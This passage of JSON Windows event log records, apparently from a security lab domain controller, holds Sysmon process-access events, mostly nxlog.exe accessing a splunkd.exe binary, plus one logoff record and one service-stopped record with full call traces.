06:59:09","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:08","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6904,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:08.725\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 804\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-12BC-5F25-0000-0010FAC80900}\r\nTargetProcessId: 3756\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:59:08.725","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"804","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-12BC-5F25-0000-0010FAC80900}","TargetProcessId":"3756","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:59:09","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:08","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6905,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:08.741\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-12BC-5F25-0000-0010FAC80900}\r\nTargetProcessId: 3756\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:59:08.741","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-12BC-5F25-0000-0010FAC80900}","TargetProcessId":"3756","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:59:09","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:08","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4634,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12545,"OpcodeValue":0,"RecordNumber":220678,"ProcessID":864,"ThreadID":900,"Channel":"Security","Message":"An account was logged off.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-8400769$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x9707B\r\n\r\nLogon Type:\t\t\t3\r\n\r\nThis event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.","Category":"Logoff","Opcode":"Info","TargetUserSid":"S-1-5-18","TargetUserName":"WIN-DC-8400769$","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0x9707b","LogonType":"3","EventReceivedTime":"2020-08-01 06:59:10","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:09","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6906,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:09.554\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3580\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:59:09.554","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3580","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:59:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:10","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6907,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:10.554\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3596\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:59:10.554","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3596","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:59:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:10","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9187343239835811840,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":7036,"SourceName":"Service Control Manager","ProviderGuid":"{555908D1-A6D7-4695-8E1E-26931D2012F4}","Version":0,"Task":0,"OpcodeValue":0,"RecordNumber":76867,"ProcessID":852,"ThreadID":936,"Channel":"System","Message":"The Windows Update service entered the stopped state.","param1":"Windows Update","param2":"stopped","EventReceivedTime":"2020-08-01 06:59:12","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:11","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6908,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:11.554\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3592\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:59:11.554","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3592","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:59:13","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:12","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6909,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:12.554\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3580\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:59:12.554","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3580","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:59:13","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:13","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6910,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:13.554\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3592\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:59:13.554","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3592","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files 